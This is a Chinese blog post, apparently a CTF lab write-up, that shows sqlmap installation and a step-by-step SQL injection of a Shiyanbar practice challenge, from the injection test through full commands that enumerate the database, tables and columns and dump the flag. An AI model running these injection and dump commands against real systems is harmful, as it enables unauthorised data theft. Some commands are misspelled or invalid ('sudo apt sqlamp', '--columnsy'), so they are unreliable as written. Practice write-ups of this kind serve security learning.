sqlmap安装与使用(实验吧第3题)

发表于 | 分类于 | 阅读次数:

使用的环境是Ubuntu系统
在这里插入图片描述

sqlmap的安装

sqlmap需要安装python2环境,python3不行(Ubuntu下默认安装python2)
输入命令:sudo apt sqlamp
检查是否安装成功
输入命令:sqlmap -help返回下面结果即为成功。
在这里插入图片描述

sqlmap基本参数

sqlmap -h 查看帮助选项
is -dba 当前用户权限
dbs 所有数据库
current-db 网站当前数据库
users 所有数据库用户
current-user 当前数据库用户
tables 参数:列表名
columns 参数:字段名
dump 参数:下载数据

sqlmap牛刀小试

我们以这到题为例http://www.shiyanbar.com/ctf/33。
如果没有注册过实验吧的朋友先注册下实验吧
拿到题目我们判断下有没有sql注入

在url后面加上and 1=1,没有报错
加上and 1=2,报错。
说明有sql注入

在这里插入图片描述
在这里插入图片描述
第一步使用sqlmap查看数据库信息
输入命令:sqlmap -u "http://ctf5.shiyanbar.com/8/index.php?id=1" --current-db
在这里插入图片描述
经过一些时间成功爆出当前数据库为my_db,如果注入过程提示选择y或者n,一般是选择y。大概就是尝试更多的方法进行注入
第二步、爆出表名
输入命令:sqlmap -u "http://ctf5.shiyanbar.com/8/index.php?id=1" -D my_db --tables

在这里插入图片描述
第三步爆字段名
输入命令:

sqlmap -u "http://ctf5.shiyanbar.com/8/index.php?id=1" -D my_db -T thiskey --columnsy

在这里插入图片描述
第四步、爆数据
输入命令:

sqlmap -u "http://ctf5.shiyanbar.com/8/index.php?id=1" -D my_db -T thiskey -C k0y --dump

稍等片刻,成功找到flag:whatiMyD91dump
在这里插入图片描述

0%